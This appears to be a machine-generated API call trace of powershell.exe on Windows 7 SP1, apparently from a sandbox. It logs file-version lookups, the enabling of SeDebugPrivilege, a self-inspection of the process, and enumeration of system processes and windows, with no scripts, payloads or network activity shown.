	[0649.101] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0655.605] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0655.605] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0655.605] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0655.605] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0682.080] GetVersionExW (in: lpVersionInformation=0x14dd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0682.085] GetVersionExW (in: lpVersionInformation=0x14dd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14dd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0682.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0682.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0682.103] GetVersionExW (in: lpVersionInformation=0x14da70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14da70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0682.104] SetErrorMode (uMode=0x1) returned 0x1
	[0682.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14dbd0 | out: lpFileInformation=0x14dbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0682.106] SetErrorMode (uMode=0x1) returned 0x1
	[0682.109] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14de40 | out: lpdwHandle=0x14de40) returned 0x94c
	[0683.540] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca72d8 | out: lpData=0x2ca72d8) returned 1
	[0683.543] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14ddb8, puLen=0x14ddb0 | out: lplpBuffer=0x14ddb8*=0x2ca7374, puLen=0x14ddb0) returned 1
	[0683.546] lstrlenW (lpString="䅁") returned 1
	[0683.555] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca7450, puLen=0x14dd20) returned 1
	[0683.556] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0683.558] CoTaskMemAlloc (cb=0x2e) returned 0x239900
	[0683.558] lstrcpyW (in: lpString1=0x239900, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0683.560] CoTaskMemFree (pv=0x239900) 
	[0683.560] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca74a4, puLen=0x14dd20) returned 1
	[0683.560] lstrlenW (lpString="System.Management.Automation") returned 28
	[0683.560] CoTaskMemAlloc (cb=0x3c) returned 0x169860
	[0683.560] lstrcpyW (in: lpString1=0x169860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0683.560] CoTaskMemFree (pv=0x169860) 
	[0683.560] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca7500, puLen=0x14dd20) returned 1
	[0683.560] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0683.560] CoTaskMemAlloc (cb=0x20) returned 0x237d00
	[0683.560] lstrcpyW (in: lpString1=0x237d00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0683.560] CoTaskMemFree (pv=0x237d00) 
	[0683.560] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca7540, puLen=0x14dd20) returned 1
	[0683.560] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0683.560] CoTaskMemAlloc (cb=0x44) returned 0x169860
	[0683.560] lstrcpyW (in: lpString1=0x169860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0683.560] CoTaskMemFree (pv=0x169860) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca75a8, puLen=0x14dd20) returned 1
	[0683.561] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0683.561] CoTaskMemAlloc (cb=0x76) returned 0x1cf9e0
	[0683.561] lstrcpyW (in: lpString1=0x1cf9e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0683.561] CoTaskMemFree (pv=0x1cf9e0) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca7644, puLen=0x14dd20) returned 1
	[0683.561] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0683.561] CoTaskMemAlloc (cb=0x44) returned 0x169860
	[0683.561] lstrcpyW (in: lpString1=0x169860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0683.561] CoTaskMemFree (pv=0x169860) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca76a8, puLen=0x14dd20) returned 1
	[0683.561] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0683.561] CoTaskMemAlloc (cb=0x58) returned 0x1b6aa0
	[0683.561] lstrcpyW (in: lpString1=0x1b6aa0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0683.561] CoTaskMemFree (pv=0x1b6aa0) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca7724, puLen=0x14dd20) returned 1
	[0683.561] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0683.561] CoTaskMemAlloc (cb=0x20) returned 0x237d00
	[0683.561] lstrcpyW (in: lpString1=0x237d00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0683.561] CoTaskMemFree (pv=0x237d00) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x2ca73cc, puLen=0x14dd20) returned 1
	[0683.561] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0683.561] CoTaskMemAlloc (cb=0x66) returned 0x232110
	[0683.561] lstrcpyW (in: lpString1=0x232110, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0683.561] CoTaskMemFree (pv=0x232110) 
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x0, puLen=0x14dd20) returned 0
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x0, puLen=0x14dd20) returned 0
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14dd28, puLen=0x14dd20 | out: lplpBuffer=0x14dd28*=0x0, puLen=0x14dd20) returned 0
	[0683.561] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dcf8, puLen=0x14dcf0 | out: lplpBuffer=0x14dcf8*=0x2ca7374, puLen=0x14dcf0) returned 1
	[0683.562] CoTaskMemAlloc (cb=0x204) returned 0x1d23f0
	[0683.562] VerLanguageNameW (in: wLang=0x0, szLang=0x1d23f0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0683.564] CoTaskMemFree (pv=0x1d23f0) 
	[0683.564] VerQueryValueW (in: pBlock=0x2ca72d8, lpSubBlock="\\", lplpBuffer=0x14dd48, puLen=0x14dd40 | out: lplpBuffer=0x14dd48*=0x2ca7300, puLen=0x14dd40) returned 1
	[0683.570] GetCurrentProcessId () returned 0x147c
	[0686.331] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14cc70 | out: lpLuid=0x14cc70*(LowPart=0x14, HighPart=0)) returned 1
	[0686.334] GetCurrentProcess () returned 0xffffffffffffffff
	[0686.335] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x14cc90 | out: TokenHandle=0x14cc90*=0x2dc) returned 1
	[0686.336] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x2caab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0686.338] CloseHandle (hObject=0x2dc) returned 1
	[0686.342] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x147c) returned 0x2dc
	[0686.352] EnumProcessModules (in: hProcess=0x2dc, lphModule=0x2caabb8, cb=0x200, lpcbNeeded=0x14dca8 | out: lphModule=0x2caabb8, lpcbNeeded=0x14dca8) returned 1
	[0686.355] GetModuleInformation (in: hProcess=0x2dc, hModule=0x13f370000, lpmodinfo=0x2caae28, cb=0x18 | out: lpmodinfo=0x2caae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0686.356] CoTaskMemAlloc (cb=0x804) returned 0x23f460
	[0686.356] GetModuleBaseNameW (in: hProcess=0x2dc, hModule=0x13f370000, lpBaseName=0x23f460, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0686.356] CoTaskMemFree (pv=0x23f460) 
	[0688.277] CoTaskMemAlloc (cb=0x804) returned 0x23f460
	[0688.278] GetModuleFileNameExW (in: hProcess=0x2dc, hModule=0x13f370000, lpFilename=0x23f460, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0688.278] CoTaskMemFree (pv=0x23f460) 
	[0688.279] CloseHandle (hObject=0x2dc) returned 1
	[0688.287] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x147c) returned 0x2dc
	[0688.288] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x14ddd8 | out: lpExitCode=0x14ddd8*=0x103) returned 1
	[0688.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cab088, Length=0x20000, ResultLength=0x14dda0 | out: SystemInformation=0x12cab088, ResultLength=0x14dda0*=0x3a4e8) returned 0xc0000004
	[0688.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb0b8, Length=0x3cce8, ResultLength=0x14dda0 | out: SystemInformation=0x12ccb0b8, ResultLength=0x14dda0*=0x3a4e8) returned 0x0
	[0689.753] EnumWindows (lpEnumFunc=0x28066ac, lParam=0x0) returned 1
	[0695.266] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.266] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x558
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x538
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x778
	[0695.267] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x778
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x460
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.268] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x4d0
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x14e0
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x17f0
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x854
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1268
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1624
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1b9c
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x16f4
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x145c
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x17d0
	[0695.269] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1d28
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xcb8
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1190
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x3a8
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1bd0
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1bfc
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1a78
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1b90
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1b04
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1b34
	[0695.270] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1b64
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1bb0
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1acc
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1a2c
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x19a8
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1944
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x18c8
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x18ac
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x18ec
	[0695.271] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1898
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc98
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x153c
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1808
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x12a4
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1740
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x16c4
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1820
	[0695.272] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x16ac
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1858
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1664
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x10b4
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x10ac
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x10ec
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1068
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x17e0
	[0695.273] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x102c
	[0695.274] GetWindow (hWnd=0x1075e, uCmd=0x4) returned 0x0
	[0695.275] IsWindowVisible (hWnd=0x1075e) returned 0
	[0695.275] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x17a4
	[0695.275] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1050
	[0695.275] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1694
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1770
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1720
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x165c
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1578
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x16c0
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x161c
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1638
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x15c8
	[0695.276] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1554
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1674
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1520
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x14bc
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xf8c
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xe9c
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1434
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x14ec
	[0695.277] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xfcc
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x12ac
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1484
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x934
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc0c
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xb08
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x948
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x1178
	[0695.278] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x13e0
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xcd0
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0x13fc
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xdc8
	[0695.279] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14db00 | out: lpdwProcessId=0x14db00) returned 0xc18
